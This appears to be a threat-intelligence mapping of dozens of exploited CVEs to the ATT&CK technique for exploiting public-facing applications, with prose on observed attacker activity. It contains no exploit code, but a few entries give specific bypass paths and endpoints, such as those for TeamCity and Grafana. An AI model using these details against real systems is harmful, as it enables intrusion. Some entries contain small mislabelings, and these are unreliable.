                              CVE-2021-45382 D-Link Multiple Routers Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This remote command execution vulnerability is exploited by an unauthenticated, remote adversary via the DDNS function in ncc2 binary file. Adversaries have leveraged this vulnerability to spread a variant of Mirai botnet called Beastmode and IZ1H9 to cause a distributed denial of service attack. In the IZ1H9 attack, once the attackers took advantage of the vulnerability, they injected the IZ1H9 payload into the device. This program included instructions to download another script from a specific web address. When this script ran, it erased records to cover up the malicious actions and then downloaded additional software designed for different types of devices. The script also changed the device's settings to block certain network connections, making it more difficult to remove the malware. After these steps, the infected device connected to a control server, waiting for instructions on which type of denial-of-service attack to carry out, such as disrupting services using various internet protocols. In the Beastmode attack, exploiting the vulnerability led to the download and execution of a script called "ddns.sh." This script then fetched the Beastmode program, which was saved and run with specific settings. These settings allowed the infected device to join a subgroup within the larger botnet, helping the attackers manage and assess the effectiveness of their exploits. Once devices were compromised by Beastmode, the botnet could be used to launch various types of denial-of-service attacks, similar to those seen in other Mirai-based botnets.
                              References
                              CVE-2021-44228 Apache Log4j2 Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This remote code execution vulnerability is exploited through maliciously-crafted requests to a web application.
                              References
                              CVE-2021-44077 Zoho ManageEngine ServiceDesk Plus Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              CVE-2021-44077 is an unauthenticated remote code execution vulnerability. The following post-exploitation activity has been observed by adversaries: writing webshells to disk for persistence, obfuscating and deobfuscating/decoding files or information, dumping user credentials, only using signed windows binaries for follow-on actions, adding/deleting user accounts as needed, exfiltrating the active directory database, using windows management instrumentation for remote execution, deleting files to remove indicators from the host, discovering domain accounts, collecting and archiving files for exfiltration, and using symmetric encryption for command and control.
                              References
                              CVE-2021-39144 XStream Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              The vulnerability allows a remote attacker to execute arbitrary code on the target system. It exists due to the deserialization of untrusted data in XStream versions up to 1.4.18. A remote attacker can exploit this by sending a specially crafted XStream marshalled payload to an endpoint in VMware NSX Manager, which uses the vulnerable xstream-1.4.18.jar package. Successful exploitation of this vulnerability may result in complete compromise of the vulnerable system, allowing execution of commands with root privileges.
                              References
                              CVE-2021-35464 ForgeRock Access Management (AM) Core Server Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              CVE-2021-35464, a pre-auth remote code execution (RCE) vulnerability in ForgeRock Access Manager identity and access management software. ForgeRock front-ends web applications and remote access solutions in many enterprises.
                              References
                              CVE-2021-35394 Realtek Jungle SDK Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              The vulnerability in Realtek Jungle chipsets is exploited by remote, unauthenticated attackers using UDP packets to a server on port 9034, enabling remote execution of arbitrary commands. The attack involves injecting a shell command that downloads and executes a shell script on the compromised device. This script downloads binaries for various CPU architectures, such as ARM, MIPS, and SuperH, primarily from the Mirai malware family, turning the device into a botnet node. The attack script connects to a malicious IP to download and execute malware, with threats mainly from Mirai, Gafgyt, and Mozi families. It also includes a new DDoS botnet called RedGoBot, developed in Golang. The script uses wget and curl to download botnet clients for different processor architectures. RedGoBot can perform DDoS attacks on various protocols, including HTTP, ICMP, TCP, UDP, VSE, and OpenVPN, upon receiving commands from the threat operator. Additionally, injected commands can write binary payloads to files for execution or reboot the targeted server to cause denial of service.
                              References
                              CVE-2021-34473 Microsoft Exchange Server Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This is a remote code execution vulnerability that is often chained with CVE-2021-34523, a privilege escalation vulnerability.
                              References
                              CVE-2021-31166 Microsoft HTTP Protocol Stack Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This memory corruption vulnerability is exploited by a remote, unauthenticated attacker via crafted HTTP packets to a server that uses http.sys to process packets. Adversaries may leverage this vulnerability to execute malicious code on the OS kernel. This vulnerability has a proof of concept validating that it can be wormable. However, exploitations in the wild linking to this type of impact have not been published. The North Korean state-backed hacker group known as the Lazarus Group has been attributed to leveraging this vulnerability in their attacks to gain initial access to Windows IIS servers. Once initial access is gained, they have exploited the vulnerable system to perform data theft, disrupt services, propagate malware, or conduct espionage or surveillance. **team review - AttackerKB links Command and Scripting to this vulnerability, but I have not found any threat reports linking this impact to an actual attack. The only "in the wild" report I found was by SecureBlink linking it to the Lazarus Group to gain initial access. Unsure what primary impact we can link to here.
                              References
                              CVE-2021-27065 Microsoft Exchange Server Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              CVE-2021-26858, part of Proxy Logon, is a post-authentication arbitrary file write vulnerability in Exchange. CVE-2021-26858 and CVE-2021-27065 are similar post-authentication arbitrary write file vulnerabilities in Exchange. An attacker, authenticated either by using CVE-2021-26855 or via stolen admin credentials, could write a file to any path on the server.
                              References
                              CVE-2021-26858 Microsoft Exchange Server Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              CVE-2021-26858, part of Proxy Logon, is a post-authentication arbitrary file write vulnerability in Exchange. CVE-2021-26858 and CVE-2021-27065 are similar post-authentication arbitrary write file vulnerabilities in Exchange. An attacker, authenticated either by using CVE-2021-26855 or via stolen admin credentials, could write a file to any path on the server.
                              References
                              CVE-2021-22986 F5 BIG-IP and BIG-IQ Centralized Management iControl REST Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              CVE-2021-22986 is a remote command execution vulnerability occurring on the iControl REST interface. Impact reported by the F5 security advisory "This vulnerability allows for unauthenticated attackers with network access to the iControl REST interface, through the BIG-IP management interface and self IP addresses, to execute arbitrary system commands, create or delete files, and disable services. This vulnerability can only be exploited through the control plane and cannot be exploited through the data plane. Exploitation can lead to complete system compromise. "
                              References
                              CVE-2021-22205 GitLab Community and Enterprise Editions Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              CVE-2021-22205 is a critical remote code execution vulnerability allowing unauthenticated attackers to execute arbitrary commands on affected systems. The vulnerability was reported to be actively exploited for o assemble botnets and launch gigantic distributed denial of service (DDoS) attacks.
                              References
                              CVE-2021-22204 ExifTool Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              The vulnerability is exploited by a remote attacker to execute arbitrary code on the target system. The vulnerability exists due to improper input validation when parsing DjVu files in ExifTool. A remote attacker can pass a specially crafted file to the application and execute arbitrary code on the target system. Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.
                              References
                              CVE-2021-21972 VMware vCenter Server Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              CVE-2021-21972 is a RCE vulnerability affecting VMware vCenter servers. An attacker with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server.
                              References
                              CVE-2020-5902 F5 BIG-IP Traffic Management User Interface (TMUI) Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              CVE-2020-5902—an RCE vulnerability in the BIG-IP Traffic Management User Interface (TMUI)—to take control of victim systems. On June 30, F5 disclosed CVE-2020-5902, stating that it allows attackers to, “execute arbitrary system commands, create or delete files, disable services, and/or execute arbitrary Java code.” - CISA Advisory
                              References
                              CVE-2020-17530 Apache Struts Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              CVE-2020-17530 is a remote code execution vulnerability in Apache Struts versions 2.0.0 - 2.5.25 allows an attacker to execute arbitrary code via forced Object Graph Navigational Language (OGNL) evaluation on raw user input in tag attributes.
                              References
                              CVE-2020-15505 Ivanti MobileIron Multiple Products Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              CVE-2020-15505 is an RCE vulnerability in MobileIron Core & Connector that allows an external attacker, with no privileges, to execute code of their choice on the vulnerable system. As mobile device management (MDM) systems are critical to configuration management for external devices, they are usually highly permissioned and make a valuable target for threat actors. Multiple APTs have been observed exploiting this vulnerability to gain unauthorized access.
                              References
                              CVE-2020-0688 Microsoft Exchange Server Validation Key Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              CVE-2020-0688 is a RCE vulnerability exists in Microsoft Exchange software when the software fails to properly handle objects in memory. A nation-state APT actor has been observed exploiting this vulnerability to conduct widespread, distributed, and anonymized brute force access attempts against hundreds of government and private sector targets worldwide.
                              References
                              CVE-2019-17558 Apache Solr VelocityResponseWriter Plug-In Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              CVE-2019-17558 is a vulnerability in Apache Solr that allows for Remote Code Execution (RCE) through the VelocityResponseWriter.
                              References
                              CVE-2019-11634 Citrix Workspace Application and Receiver for Windows Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              Vulnerability in Citrix Receiver for Windows may allows attacker to gain read/write access to the client's local drives, potentially enabling code execution on the client device, such as deploying ransomware
                              References
                              CVE-2019-0604 Microsoft SharePoint Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              CVE-2019-0604 is a vulnerability in an XML deserialization component within Microsoft SharePoint allowed remote attackers to typically install webshell malware to vulnerable hosts.
                              References
                              CVE-2018-7600 Drupal Core Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              CVE-2018-7602 is a remote code execution (RCE) vulnerability affecting Drupal’s versions 7 and 8. According to reports, successfully exploiting the vulnerability entails elevating the permission to modify or delete the content of a Drupal-run site and crypto-jacking campaigns.
                              References
                              CVE-2018-11776 Apache Struts Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              CVE-2018-11776 is a remote code execution vulnerability in the Apache Struts web application framework that could allow remote attackers to run malicious code on the affected servers when alwaysSelectFullNamespace is true and then results are used with no namespace.
                              References
                              CVE-2017-9822 DotNetNuke (DNN) Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              CVE-2017-9822 is a vulnerability allows an attacker to exploit cookie deserialization, leading to remote code execution (RCE). It has been noted for its potential impact on various web applications
                              References
                              CVE-2017-5638 Apache Struts Remote Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              CVE-2017-5638 is a remote code execution vulnerability in Apache Struts Jakarta Multipart versions that allows for malicious file upload using Content-Type, Content-Disposition, or Content-Length HTTP headers during file-upload attempts leading to an attacker to execute arbitrary commands. This CVE was known to be exploited during the Equifax breach.
                              References
                              CVE-2016-4437 Apache Shiro Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              CVE-2016-4437 is a code execution vulnerability in Apache Shiro that allows remote attackers to execute code or bypass access restrictions via an unspecified request parameter when a cipher key has not been configured for the "remember me" feature.
                              References
                              CVE-2014-7169 GNU Bourne-Again Shell (Bash) Arbitrary Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              CVE-2014-7169 allows environment variables set from service/HTTP requests on a serve (e.g. HTTP_COOKIE) in Bash shell that allows for spawning a child shell with the authority/privilege level of the parent shell to perform RCE of code provided by the adversary in the request.
                              References
                              CVE-2014-6271 GNU Bourne-Again Shell (Bash) Arbitrary Code Execution Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              CVE-2014-6271 allows environment variables set from service/HTTP requests on a serve (e.g. HTTP_COOKIE) in Bash shell that allows for spawning a child shell with the authority/privilege level of the parent shell to perform RCE of code provided by the adversary in the request.
                              References
                              CVE-2016-10033 PHPMailer Command Injection Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              CVE-2024-4879 ServiceNow Improper Input Validation Vulnerability primary_impact T1190 Exploit Public-Facing Application
                              Comments
                              CVE-2024-4879 is a Template Injection Vulnerability in ServiceNow UI Macros. When ServiceNow instances are installed public-facing instead of internally, they can be exploited for arbitrary code execution. Adversaries have been observed selling data exfiltrated through this exploit.
                              References
                              CVE-2022-24086 Adobe Commerce and Magento Open Source Improper Input Validation Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability can be exploited via a public-facing e-commerce application in order to achieve remote code execution. To evade detection, the exploit segment responsible for downloading and executing the remote malicious PHP code is obfuscated.
                              References
                              CVE-2024-21762 Fortinet FortiOS Out-of-Bound Write Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability allows adversaries to execute arbitrary code via specially crafted http requests that trigger an out of bounds write. Threat actors have been observed implementing a symbolic link, left behind to maintain read-only access to impacted devices.
                              References
                              CVE-2025-5777 Citrix NetScaler ADC and Gateway Out-of-Bounds Read Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This memory leak vulnerability in Citrix NetScaler/ADC Gateway devices can be leveraged by sending malicious authentication requests, leaking sensitive information.
                              References
                              CVE-2024-4358 Progress Telerik Report Server Authentication Bypass by Spoofing Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              CVE-2024-4358 is an authentication bypass vulnerability. This has been seen to be chained with CVE-2024-1800 in order to achieve remote code execution.
                              References
                              CVE-2024-27198 JetBrains TeamCity Authentication Bypass Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This authentication bypass vulnerability is exploited by an unauthenticated, remote adversary via an alternative path issue in the web component allowing attackers to perform admin actions and achieve remote code execution. To exploit this vulnerability, attackers need to generate an unauthenticated 404 HTTP response, pass the HTTP query string “?jsp=/app/rest/server”, and append “;.jsp” to the HTTP path parameter.
                              References
                              CVE-2023-46805 Ivanti Connect Secure and Policy Secure Authentication Bypass Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited through an authentication bypass weakness in the web component of Ivanti Connect Secure and Ivanti Policy Secure. Remote attackers leverage this vulnerability to gain unauthorized access by bypassing control checks.
                              References
                              CVE-2023-42793 JetBrains TeamCity Authentication Bypass Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited through an authentication bypass in JetBrains TeamCity, allowing remote attackers with HTTP(S) access to perform unauthorized remote code execution. This vulnerability enables attackers to gain administrative control of the TeamCity server and execute cmd.exe for various malicious activities, including downloading and executing harmful files.
                              References
                              CVE-2023-38035 Ivanti Sentry Authentication Bypass Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability was exploited by unauthenticated actors who accessed the System Manager Portal of Ivanti MobileIron Sentry via port 8433, leveraging an authentication bypass flaw to achieve remote code execution. This flaw allows attackers to access sensitive APIs, enabling them to change configurations, execute system commands, or write files onto the system. This vulnerability was part of a campaign involving cryptocurrency mining and internal network reconnaissance. The exploitation allowed attackers to deploy malicious tools and conduct unauthorized activities within the network, ultimately compromising system integrity and security.The exploitation facilitated unauthorized access to the Ivanti Sentry server, allowing the execution of OS commands as a system administrator using "sudo." Observations revealed that suspicious SSL connections over port 8433 led to HTTP GET requests, indicating the abuse of command-line utilities like wget and cURL.
                              References
                              CVE-2023-35078 Ivanti Endpoint Manager Mobile Authentication Bypass Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited through an unauthenticated API access flaw in Ivanti EPMM. Attackers initiate this vulnerability by leveraging the default internet-facing API configuration, allowing them to access restricted functionalities without authentication. This enables them to extract personally identifiable information (PII) and perform administrative actions, such as creating new accounts and making configuration changes.
                              References
                              CVE-2022-40684 Fortinet Multiple Products Authentication Bypass Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              CVE-2022-23131 Zabbix Frontend Authentication Bypass Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited by a malicious actor via improper validation via SAML to modify session data and escalate privileges to gain admin access to the Zabbix Frontend. This allows attackers to control the saml_data[username_attribute] value. This flaw enables unauthenticated users to bypass authentication and access the Zabbix dashboard as a highly-privileged user, such as the default "Admin" user. Additionally, incorrect handling of Zabbix installer files permits unauthenticated users to access and reconfigure servers.
                              References
                              CVE-2022-1040 Sophos Firewall Authentication Bypass Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This authentication bypass vulnerability is exploited by remote attackers via the User Portal and Webadmin components. This vulnerability allows an attacker to execute arbitrary code on the victim machine. It was actively exploited by Chinese state-sponsored APT groups, including "Drifting Cloud," to target organizations and governments across South Asia, particularly in Afghanistan, Bhutan, India, Nepal, Pakistan, and Sri Lanka. The attackers leveraged this vulnerability to deploy webshells, conduct man-in-the-middle attacks by modifying DNS responses, and intercept user credentials and session cookies from content management systems. This vulnerability was exploited by Chinese state-sponsored threat actors as part of a broader campaign named "Pacific Rim." This campaign involved multiple Chinese APT groups, including APT31, APT41, and Volt Typhoon, targeting Sophos firewalls. The backdoor PygmyGoat, a novel rootkit that takes the form of a shared object ("libsophos.so"), has been found to be delivered following the exploitation of this vulnerability. The use of the rootkit was observed between March and April 2022 on a government device and a technology partner, and again in May 2022 on a machine in a military hospital based in Asia. This vulnerability was also exploited by at least two advanced persistent threat (APT) groups in a highly targeted attack campaign. The attackers used the vulnerability to place malicious files into a fixed filesystem location on affected devices, leveraging a combination of authentication bypass and command injection to execute arbitrary commands as root. The attack involved deploying various malware families, including GoMet and Gh0st RAT, to maintain persistent access and exfiltrate sensitive data. The attackers demonstrated significant knowledge of the device firmware, using custom ELF binaries and runtime packers like VMProtect to complicate analysis. They manipulated internal commands to move and manipulate files, execute processes, and exfiltrate data. The campaign targeted network security devices, employing a two-stage attack to drop remote access tools and execute commands remotely.
                              References
                              CVE-2021-44515 Zoho Desktop Central Authentication Bypass Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              CVE-2021-44515 is an authentication bypass vulnerability. Post-exploit, APT actors were observed dropping a webshell, downloading post-exploitation tools, enumerating domain users and groups, conducting network reconnaissance, attempting lateral movement and dumping credentials.
                              References
                              CVE-2021-40539 Zoho ManageEngine ADSelfService Plus Authentication Bypass Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This is an authentication bypass vulnerability that can enable remote code execution. Numerous post-exploitation impacts by threat actors are detailed in the referenced CISA report.
                              References
                              CVE-2021-39226 Grafana Authentication Bypass Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This authentication bypass vulnerability is exploited by both unauthenticated and authenticated adversaries via the snapshot feature in Grafana. Attackers have leveraged this vulnerability to access and manipulate snapshot data, potentially leading to unauthorized data exposure and loss. Exploitation techniques have not been publicly published. In exploitation scenarios, adversaries can view snapshots with the lowest database key by accessing specific paths, such as /dashboard/snapshot/:key or /api/snapshots/:key. If the "public_mode" configuration is set to true, unauthenticated users can also delete these snapshots using the path /api/snapshots-delete/:deleteKey. This capability allows attackers to enumerate and delete snapshot data, resulting in complete data loss.
                              References
                              CVE-2021-37415 Zoho ManageEngine ServiceDesk Authentication Bypass Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability allows a few REST-API URLs without authentication.
                              References
                              CVE-2013-0632 Adobe ColdFusion Authentication Bypass Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              CVE-2013-0625 Adobe ColdFusion Authentication Bypass Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited because of password misconfiguration.
                              References
                              CVE-2025-0108 Palo Alto Networks PAN-OS Authentication Bypass Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This exploit is part of a chain of exploits (with CVE-2025-0108 and CVE-2024-9474) that can end with an attacker gaining root access to the system. This vulnerability allows the attacker to bypass authentication using the PAN-OS web management interface, as well as invoke PHP scripts. The attacker can also use their newfound privileged access to reconfigure the firewall, allowing for backdoors to be created.
                              References
                              CVE-2022-43939 Hitachi Vantara Pentaho BA Server Authorization Bypass Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              Due to a regex flaw, an attacker can use non-canonical URLs to bypass authentication. When chained with CVE-2022-43769, can lead to unauthorized code execution.
                              References
                              CVE-2025-4427 Ivanti Endpoint Manager Mobile (EPMM) Authentication Bypass Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              By sending a specially crafted HTTP GET request to the Ivanti EPMM endpoint, an attacker can bypass the authentication mechanisms. This can be chained with CVE-2025-4428 to achieve remote code execution.
                              References
                              CVE-2023-49103 ownCloud graphapi Information Disclosure Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited through an unauthenticated information disclosure flaw in the Graph API extension of ownCloud. Attackers first used this vulnerability to gain initial access by targeting the /apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php endpoint, which allowed them to leak sensitive information via the PHP function phpinfo. By modifying the requested URI to bypass Apache web server rewrite rules, attackers could access environment variables containing secrets, such as usernames, passwords, and license keys.
                              References
                              CVE-2023-38205 Adobe ColdFusion Improper Access Control Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              CVE-2023-38205 is a vulnerability that is the result of an incomplete patch of CVE-2023-29298. An adversary remains able to exploit the public-facing application as a result of this vulnerability.
                              References
                              CVE-2023-29298 Adobe ColdFusion Improper Access Control Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is used by exploited a public-facing application by exploiting a flaw in URL path validation.
                              References
                              CVE-2023-27350 PaperCut MF/NG Improper Access Control Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              CVE-2023-27350 allows an unauthenticated actor to execute malicious code remotely without credentials. Threat actors have been observed exploiting this software through its print scripting interface and installed command and control software on target machines.
                              References
                              CVE-2023-22518 Atlassian Confluence Data Center and Server Improper Authorization Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              CVE-2023-22518 is an improper authorization vulnerability. Adversaries have been seen using HTTP POST requests to upload maliciously-crafted zip files to Confluence WebServers to exploit this vulnerability. After exploitation, adversaries were observed doing local system information discovery and downloading malicious payloads.
                              References
                              CVE-2023-22515 Atlassian Confluence Data Center and Server Broken Access Control Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited through improper input validation in Atlassian Confluence, allowing remote attackers to translate arbitrary HTTP parameters into getter/setter sequences via the XWorks2 middleware. This vulnerability enables the creation of unauthorized Confluence administrator accounts and the upload of malicious plugins, granting attackers the ability to modify Java objects at runtime and execute arbitrary code. A nation-state actor known as Storm-0062 has been attributed to exploiting this vulnerability in the wild.
                              References
                              CVE-2021-40655 D-Link DIR-605 Router Information Disclosure Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited when an adversary forges a post request to the / get cfg.php page. The POST request could enable the adversary to obtain username and password information on the router.
                              References
                              CVE-2021-26085 Atlassian Confluence Server Pre-Authorization Arbitrary File Read Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability allows viewing of restricted resources via a pre-authorization arbitrary file read vulnerability.
                              References
                              CVE-2021-22017 VMware vCenter Server Improper Access Control exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              The vulnerability in Rhttproxy within VMware's vCenter Server arises from an improper implementation of URI normalization. Attackers with network access to port 443 on the vCenter Server exploit this flaw by sending specially crafted requests, allowing them to bypass the proxy mechanism. This exploitation grants unauthorized access to internal endpoints, potentially exposing sensitive information.
                              References
                              CVE-2019-1653 Cisco Small Business RV320 and RV325 Routers Information Disclosure Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              CVE-2019-1653 is a critical information disclosure vulnerability affecting Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers. This vulnerability allows unauthenticated, remote attackers to access sensitive information from affected devices.
                              References
                              CVE-2013-0631 Adobe ColdFusion Information Disclosure Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited via a public-facing application. The adversary can use this vulnerability to gain access to victim host information.
                              References
                              CVE-2009-3960 Adobe BlazeDS Information Disclosure Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited through an XML injection or XML external entity injection. In-the-wild reporting indicates adversaries have used this exploit to establish a web shell on a victim machine. This adversary took actions to cover their tracks, establish persistence, exfiltrate Registry data, escalated privileges, moved laterally, disabled security software, installed and ran ransomware.
                              References
                              CVE-2025-49706 Microsoft SharePoint Improper Authentication Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This improper authentication vulnerability in Microsoft SharePoint allows an attacker to send unauthenticated HTTP POST requests to the endpoint, which SharePoint will trust the request if constructed correctly. This gives the attacker access to the APIs despite the lack of credentials, as well as the ability to impersonate users and abuse native functionality.
                              References
                              CVE-2024-20353 Cisco ASA and FTD Denial of Service Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited by a remote, unauthenticated attacker by sending a crafted HTTP request to a vulnerable device's web server. This exploitation is possible due to incomplete error checking when parsing HTTP headers. If successfully exploited, it can cause the device to reload unexpectedly, resulting in a denial of service (DoS) condition. In early 2024, the Cisco Product Security Incident Response Team (PSIRT) identified an attack campaign named ArcaneDoor, which targeted these vulnerabilities to implant malware, execute commands, and potentially exfiltrate data from compromised devices.
                              References
                              CVE-2022-0028 Palo Alto Networks PAN-OS Reflected Amplification Denial-of-Service Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              CVE-2022-0028 is a reflected amplification Distributed-Denial-of-Service (DDoS) vulnerability with Palo Alto's PAN-OS firewall software. Public reports have announced the attempted exploit of this vulnerability to produce DDOS attack.
                              References
                              CVE-2023-3519 Citrix NetScaler ADC and NetScaler Gateway Code Injection Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability allows for unauthenticated remote code execution. This can be exploited via an HTTP GET request that triggers a stack buffer overflow. Adversaries have been observed to use this exploitation to drop a webshell on a target machine and subsequently discover, collect, and exfiltrate active directory data.
                              References
                              CVE-2022-22947 VMware Spring Cloud Gateway Code Injection Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited by a remote attacker via a code injection attack to gain perform arbitrary remote code execution. CISA has linked this vulnerability to adversary campaigns performed by Andariel to perform cyber espionage via ransomware operations.
                              References
                              CVE-2021-44529 Ivanti Endpoint Manager Cloud Service Appliance (EPM CSA) Code Injection Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited after an adversary sends a maliciously crafted cookie to the client endpoint (/client/index.php) to exploit Ivanti systems that utilized a malicious version of the "csrf-magic", which creates a backdoor into an Ivanti system. An unauthorized user can then execute malicious code stored in the cookie via Ivanti's "nobody" user account.
                              References
                              CVE-2025-49704 Microsoft SharePoint Code Injection Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              When chained with CVE-2025-49706, this vulnerability allows for an attacker to send a malicious __VIEWSTATE object to the same endpoint that the POST requests were sent to. This exploits a code injection flaw and allows for code execution.
                              References
                              CVE-2025-4428 Ivanti Endpoint Manager Mobile (EPMM) Code Injection Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              By itself, this exploit requires an authenticated user in order to carry it out. However, when chained with CVE-2025-4427, the attacker achieves unauthenticated remote code execution.
                              References
                              CVE-2022-39197 Fortra Cobalt Strike Teamserver Cross-Site Scripting (XSS) Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited by a remote attacker to execute HTML on the Cobalt Strike team server. To exploit this vulnerability, an attacker would inspect a Cobalt Strike payload and modify the username field within the payload to be malformed. This manipulation enables the attacker to execute arbitrary code by setting a malformed username in the Beacon configuration. In a documented cybersecurity incident, a Chinese threat actor leveraged a modified version of Cobalt Strike, known as "Cobalt Strike Cat," which included a patch for CVE-2022-39197. This version was used to establish communication channels with victim systems, perform evasive post-exploitation activities, and maintain persistence.
                              References
                              CVE-2023-46604 Apache ActiveMQ Deserialization of Untrusted Data Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited by a remote attacker who manipulates serialized class types in the OpenWire protocol to run arbitrary shell commands. This allows the adversary to execute remote code, leading to the download and installation of malware, such as the Kinsing malware and cryptocurrency miners, on Linux systems. Additionally, attackers have attempted to deploy ransomware, attributed to the HelloKitty ransomware family, on target systems.
                              References
                              CVE-2023-38203 Adobe ColdFusion Deserialization of Untrusted Data Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability can be utilized by exploited a public-facing application. APT groups have used this exploit to deploy webshells.
                              References
                              CVE-2023-29492 Novi Survey Insecure Deserialization Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              CVE-2023-29492 is an insecure deserialization vulnerability. Exploitation of this vulnerability gives remote attackers arbitrary code execution in the context of the service account.
                              References
                              CVE-2023-29300 Adobe ColdFusion Deserialization of Untrusted Data Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability can be utilized by exploited a public-facing application. APT groups have used this exploit to deploy webshells.
                              References
                              CVE-2023-26360 Adobe ColdFusion Deserialization of Untrusted Data Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability gives an adversary access through exploitation of a public-facing server.
                              References
                              CVE-2023-26359 Adobe ColdFusion Deserialization of Untrusted Data Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is utilized by exploiting a public-facing server.
                              References
